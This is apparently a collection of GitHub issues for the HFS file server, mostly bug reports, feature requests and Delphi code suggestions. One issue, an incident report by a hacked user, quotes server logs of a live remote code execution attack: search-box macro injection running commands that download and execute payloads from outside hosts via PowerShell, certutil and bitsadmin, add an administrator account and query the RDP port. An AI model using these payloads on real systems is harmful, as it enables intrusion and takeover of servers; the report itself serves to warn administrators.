rejetto / hfs2 Goto Github PK

between and between! macros in alias.txt are broken. There are pairs of .} missing, which should be there to close {.and.

They should be:

between=if|{.$1 < $3.}|{:{.and|{.$1 <= $2.}|{.$2 <= $3.}.}:}|{:{.and|{.$3 <= $2.}|{.$2 <= $1.}.}:}
between!=if|{.$1 < $3.}|{:{.and|{.$1 < $2.}|{.$2 < $3.}.}:}|{:{.and|{.$3 < $2.}|{.$2 < $1.}.}:}

Fix it ;)

*.mp4 files become .bin when downloaded with some browsers.

I found a problem when I used my mobile QQ browser to download :

Hi,
I have used the custom ip option and added my domain then used cloudflare to show it but i tis not working.

do you know why?
I have used port 12400
is it related to that?

Thanks

The condition "if sizeOfFile(MACROS_LOG_FILE) = 0 then" is checking if the log file is empty before appending the new record. This can lead to an additional read of the file to check the size, which can be inefficient for large files. An alternative would be to keep a separate counter or use a global variable to check if this is the first time a record is being added and then add the log header if so.

const
  HtmlEncodeChars: array[0..4] of record
    Char: Char;
    Code: string;
  end = (
    (Char: '<'; Code: '&lt;'),
    (Char: '>'; Code: '&gt;'),
    (Char: '&'; Code: '&amp;'),
    (Char: '"'; Code: '&quot;'),
    (Char: ''''; Code: '&apos;')
  );

function htmlEncode(const s: string): string;
var
  i, j, len: integer;
begin
  len := Length(s);
  SetLength(Result, len * 6); // máximo tamanho possível após a conversão
  j := 1;

  for i := 1 to len do
  begin
    if s[i] < ' ' then // caracteres de controle
    begin
      Result[j] := '?';
      Inc(j);
    end
    else
    begin
      case s[i] of
        '<', '>', '&', '"', '''':
          begin
            Move(PChar(HtmlEncodeChars[s[i] = '<']).^, PChar(@Result[j])^, Length(HtmlEncodeChars[s[i] = '<']) * SizeOf(HtmlEncodeChars[0]));
            Inc(j, Length(HtmlEncodeChars[s[i] = '<']));
          end;
      else
        Result[j] := s[i];
        Inc(j);
      end;
    end;
  end;

  SetLength(Result, j - 1);
end;

Create a constant called HtmlEncodeChars that contains a list of HTML characters and their HTML encoded equivalents.

I've defined an htmlEncode function that iterates through the characters in the input string, checks whether each character needs to be HTML-encoded, and then adds the encoded character to the result. This is done using the Move function to copy the corresponding HTML code into the result.

If the macrosLog method is called frequently over a short period of time, it can be useful to group multiple log entries into a single write to disk.

This can be done by adding a global variable that stores the last write time to disk and then checking that a sufficient amount of time has passed since the last disk write before writing the new log entry.

How to setup browsable to users only and file downlodable to everyone?
so if I use
domain.com/FOLDER - Only user can see who has access
domain.com/FOLDER/file.txt - can be seen and downloadable by everyone

I tried to download some 10k pictures with 150 get requests at the same time, and then some pictures were not loaded in more than ten seconds. Is there any restriction on high concurrency?

Hi,
I found a bug, When I use cloudflare proxy, user can't login and when I turn it off. it works fine

The error that I get is "bad password" even when I am using correct pass. I tried using it without proxy and it worked fine.

Thanks

Hi there @rejetto, I have had HFS 2.3.x and 2.4.x running on two of my servers. Today I wanted to share some files, so I tried to open it from the tray bar, however, it seems that the .exe file is gone on both servers!

Is this something intentional (maybe you added it because of the recent RCE exploit)? Or is it something that I need to be concerned about, maybe the servers are infected? 😲

I would appreciate some clarification!

I need to switch between different usernames, but there's no function to logout.
Would you please add this function?

on the web, hfs is using the file's modified time as the info of the file.
But maybe hfs can use the time added to hfs' VFS for better sorting both on web and local ui to important the new files.

Another thought:
And both VFS window and log window displays left-right horizontal texts.
And if the window is not enough for the text(filename or URL path), then the texts get truncated.
So the VFS window and log window and log box window can use a stacked layout for a better view.

A recent scan is triggering 16 different AV: https://www.virustotal.com/gui/file/42d14f9efe83cd9d695d0796232bd6e12d276c1262b6cf39d31cfcf64e128f11/detection

Can anything be done about this?

We can test this on Linux using the following command:

ab -n 20000 -c 20 http://1.coco56.top/%E5%A4%A7%E5%9E%8B%E8%BD%AF%E4%BB%B6/

open directly in browser function duplicated in menu and mime types... window.

the contents of mime types also are missing common already known files.

maybe the menu one open directly in browser can be integrated into mime types... window

Hello,

Please note that the file is uploaded twice even a single post method is invoked (2.4.0 RC6).

00:49:15  127.0.0.1:50773  Connected
00:49:15  [email protected]:50773  Uploading EINVOICE-2021918922516830.PDF
00:49:15  [email protected]:50773  Fully uploaded EINVOICE-2021918922516830.PDF - 189.9 K @ 855.4 KB/s
00:49:15  [email protected]:50773  Disconnected by server - 52 bytes sent
00:49:15  127.0.0.1:50774  Connected
00:49:15  [email protected]:50774  Uploading EINVOICE-2021918922516830.PDF
00:49:16  [email protected]:50774  Fully uploaded EINVOICE-2021918922516830.PDF - 189.9 K @ 811.6 KB/s
00:49:16  [email protected]:50774  Requested POST /HFS/
00:49:16  [email protected]:50774  Request dump
> POST /HFS/ HTTP/1.1
> Connection: keep-alive
> Content-Type: multipart/form-data; boundary=--------101221004915412
> Content-Length: 194705
> Host: localhost
> User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
> Authorization: Basic VXNlcm5hbWU6UGFzc3dvcmQ=
00:49:19  [email protected]:50774  Disconnected - 139 bytes sent

Best regards.

I

Using IPv6 access :

Using IPv4 access :

I want to built it by myself.

IPv4 addresses are now exhausted. This have become one of the factors restricting the development of the Internet. The Chinese government and the ministry of industry and information technology are working hard on IPv6. So far, there are more than one billion IPv6 users in China. So there is an urgent need for applications that support IPv6.

As we all know, without a global network IP address, it is difficult for others to download to the files we have shared. And in many cases, they can only access the files by connecting to the same router as us.

Sometimes the service does not respond. After a lot of files are transferred, the web page and other requests are not accepted, and the software functions are displayed normally. At this time, the service needs to be restarted to continue running. Here is a timer, 10 second interval, whether Will affect performance.

procedure TmainFrm.TimerTestTimer(Sender: TObject);
begin
if(not srv.active) then
  begin
  add2log('not active');
  if assigned(srv) then srv.stop();
  srv.port := port;
  srv.start(listenOn);
  end
else
  begin
  add2log('active');
  end;
end;

If 1 or more items are selected, regardless of their type, using the "Archive"
feature redirects to /~lib.js?mode=archive&recursive instead of generating
a TAR archive and downloading it.

Would it be possible to add the hostname and current date in the TAR filename ?
Like example.com_20201010_home.folder.tar

Thanks,

version: hfs 2.4RC7 (Don't know if 2.3m has this issue.)

the hfs usually has 1~2 folders, 100+ files.
the file size of the corrupted .vfs usually is about 300bytes.
and via a text editor, can see only the first few(usually <10) items in the .vfs file. all the others items are lost.

guess:
the filenames usually contain special characters, or chinese, or japanese. like ( ) [ ] { } ` & ~ @ _.
the hfs has run > a few hours.

In VFS, after dragging an item to/from a folder, it's path (which will be copied/opened in browser) will not update immediately, stay at wrong path.

i got some issue with 2.4 RC7 :

1. hfs can't load web page with corectly ( seems like css or template) (run with wine on raspbery pi)
but 2.3m run working well no have issue css or template.
2. i can't set my local ip with http://192.x.x.x in hfs application. they are always use http://localhost. seems like 192.x.x.x gone in ip address menu by default. (run with wine on raspberry pi). but if i type manual 192.x.x.x:port in web browser it's still work.
im not using external ip.

ERROR:crash_report_database_win.cc(469)] failed to stat report

debug.log

Greetings,
At the moment I am facing a problem and I would like to understand if it is due to the possible absence of an index or cache.
I have 98gb of 23,000 files in 3250 folders, when I search, it also takes 3-5 minutes before I get results.
I think it could be due to a lack of indexes, is it possible to implement improvements from this point of view? Like some modification in the template to use.
Or is it a code-side thing of the program?
Or am I doing something wrong?

hfs2.4RC06

Specs:
DL380 G6 | x2 cpu Xeon l5630;
Windows Server 2019 x64 DC LTSC;
32GB DDR3 1033mhz;
Files on HDD sata2 active (sata3 supported);
OS un SSD "";

Screen:

Thanks in advance

My HFS file server (W10) has just been hacked : it's time to update, don't use old versions anymore !

This is some informations for administrators.
The hack looks like this one : rapid7/metasploit-framework#19240
(not https://www.exploit-db.com/exploits/49584 )

I noticed strange commands in HFS logs, that look like remote commands in Search box.

• The hacker downloaded some programs and executed them : Crash.exe WindowsWatcher.key Roboform.dll
• I searched in Windows Event logs (System) : Service Control Manager indicated the creation of Cpprintsrv service in hidden folder.
  C:\ProgramData\Microsoft\CrashPrintf\Crash.exe
• The hacker also read the port number for Terminal Server, but it's not the same in router, fortunately...
• After that hfs.exe was deleted and I realised something was wrong, so I found logs.
• IP addresses change often and may be located in Asia, like used name (WanLiChangChengWanLiChang) :
  146.70.200.117 164.90.160.59 165.227.68.140 3.38.212.132 104.28.158.204 103.119.15.175 43.205.207.16 103.119.15.175 61.52.169.128 104.28.153.15 104.28.158.204

HFS Logs :
09/06/2024 11:20:44 146.70.200.117 44116 Connected
09/06/2024 11:20:44 146.70.200.117 44116 Requested GET /?n=

&cmd=ipconfig+/all&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESUTLT:{.?n.}{.^abc.}===={.?n.}
09/06/2024 18:14:17 164.90.160.59 59642 Requested GET /?n=
&cmd=nslookup+cpit4a9no3sf3j5nia3gjkq7s6mq4anoy.oast.online&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 08:06:56 165.227.68.140 60692 Connected
11/06/2024 08:06:56 165.227.68.140 60692 Requested GET /?n=

&cmd=cmd+/c+echo 505227774 > C:/Users/Public/Downloads/0&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}
11/06/2024 08:06:58 165.227.68.140 60694 Connected
11/06/2024 08:07:11 165.227.68.140 60694 Requested GET /?n=
&cmd=cmd+/c+powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://dpp-s3-data.s3.amazonaws.com/tpPNDWqMh5ubw','C:/Users/Public/Downloads/1.exe')&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}

11/06/2024 16:46:20 104.28.158.204 62279 Requested GET /?n=

&cmd=RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:46:20 104.28.153.15 14204 Requested GET /?n=
&cmd=certutil+-urlcache+-split+-f+http://39.101.122.168:889/RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:51:02 61.52.169.128 59799 Requested GET /?n=
&cmd=ipconfig&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 17:49:18 103.119.15.175 47684 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:49:18 103.119.15.175 47690 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//85.209.133.45%3A7598/dong.exe%27%29%29%22%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:53:25 43.205.207.16 60144 Requested GET /?n=

&cmd=ipconfig+/all&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 17:55:36 103.119.15.175 52008 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:55:36 103.119.15.175 52010 Requested GET /?n=%0A&cmd=bitsadmin.exe%20/transfer%20%22DownloadFile%22%20http%3A//85.209.133.45%3A7598/dong.exe%20%22%25CD%25%5Cdong.exe%22%20%26%26%20dong.exe&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 18:28:56 103.119.15.175 56406 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 18:28:56 103.119.15.175 56414 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//120.131.13.101%3A8080/index.php%27%29%29%22&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 20:37:49 103.119.15.175 47594 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:37:49 103.119.15.175 47606 Requested GET /?n=%0A&cmd=net%20localgroup%20Administrators%20wlccwlc%20/add&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 20:47:31 103.119.15.175 39702 Requested GET /?n=%0A&cmd=REG%20query%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%20Server%5CWinStations%5CRDP-Tcp%20/v%20PortNumber&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:57:17 103.119.15.175 34474 Connected
11/06/2024 20:57:17 103.119.15.175 34474 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Crash.exe+-OutFile+c:\users\public\Crash.exe&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:15:49 3.38.212.132 52953 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/WindowsWatcher.key+-OutFile+c:\users\public\WindowsWatcher.key&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:16:04 3.38.212.132 52955 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Roboform.dll+-OutFile+c:\users\public\Roboform.dll&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

redirects to undefined (temporary fix: replace undefined with '')

HFS.Libraries, Where can I download this library file? The forum downloads the old version.

video showc

Very simple, a user who doesn't have permission to download should also NOT view the contents of the folder in question. He actually gets a 401 error trying to access the folder. However, using the "deep Search" function it is able to find files and folders that were supposed to remain hidden.
This may be intentional (since it refers to a simple "disable downloading for the contents of this folder" instead of an actual "hide this folder and its contents and prevent viewing/downloading").
Anyway, thanks again 👍

Dear author. Thank you for bringing such a convenient web file sharing server to the Internet,But now there is a big problem in the server, that is, the global public network IPv4 has been exhausted.At present, most broadband service providers always use nat-ipv4 to enable multiple users to share a public IPv4 address,Because dynamic DNS can only be realized on the basis that users directly hold a dynamic public network IPv4，Therefore, now individual users cannot use dynamic DNS to share their files with the outside world
However, now the new version 6 network protocol has become more and more mature, which has perfectly solved the problem of depletion of IPv4 in the global public network.
However, the new version 6 network protocol has become more and more mature, which has perfectly solved the problem of depletion of IPv4 in the global public network. At this stage, most of the leading broadband service providers have access to IPv6 network and promised to assign no less than / 60 prefix to individual users. However, some backward small broadband service providers have not yet access to IPv6 network, Therefore, I suggest that you should support dual protocol stack as soon as possible, that is, both V4 and V6. It not only facilitates the use of individual users who do not have public network V4 but have public network V6, but also facilitates users with only V4 network access to access the sharing stations provided by their friends.

icon is too small on my pc (surface pro 4 with resolution 2736*1824)

wanted to update the vfs file via python and other languages for convenience.

I tried blow with python.

for _ in range(900):
    try:
        print(zlib.decompress(a[_:].decode('utf8')+b'\0'))
    except:
        pass

but failed to parse the compressed vfs file. It seems that the data after the header part within the .vfs file is not compressed by zlib.

is it able to add wiki for how the struct of vfs file works?

want to try save vfs with 2.3m, because #20.

I found this line from 2.4RC7(which has newer theme) can't work with 2.3m. but the two versions just use the same symbols only, and the macros don't affect any <a> tag of this section.

checked documents, but found nothing about [+folder] section means.

is there any quickfix for this issue? Thanks

the Delphi Community Edition currently seems completely broken: when signing up, you get an email with a serial-code, and when trying to use that serial-code during installation, it will say

No valid license information found for Embarcadero Delphi 10.4. You must provide a valid serial number(blablabla)

and when trying to email [email protected] about the issue, you get an error

550 5.1.1 The email account that you tried to reach does not exist. Please try double-checking the recipient's email address for typos or unnecessary spaces.

so yeah... seems Delphi Community Edition is not currently an option.. Anyone tried compiling it on Free Pascal?

Version: 2.4.0 RC7
Also, in the 4th pic, the columns will always be rested to default after some time since sorted.

Hey Rejetto,

I've been trying out HFS for the last couple days. It's been working great. Nice work!

I was curious if this 5 year old post about remote execution is still valid.

Thanks!

Current browsers don't allow Cross-Origin Resource Sharing (CORS).
That's painful during development when using hfs to provide data-files.
For this hfs needs to provide the header
Access-Control-Allow-Origin: *

Could this be implemented, please?

Details:
https://web.dev/cross-origin-resource-sharing/
https://stackoverflow.com/questions/10636611/how-does-access-control-allow-origin-header-work

if the user window has a user says name:a pwd:b, then set / point's access to the user a, and choose one of many files in / to use set user/pass option to set name:c pwd:d.
then go to the web to access the file using a:bwill get no permission, using c:d will get error username not found.

I checked the web did send the right request with POST. and the hfs UI loged the requests but without the form data. so guess may be an issue with the hfs server end.

ps. also found the delete(with rename) permission wouldn't work at all. What would delete and rename option of the web do? will it delete/rename files just in vfs? or actually on disk?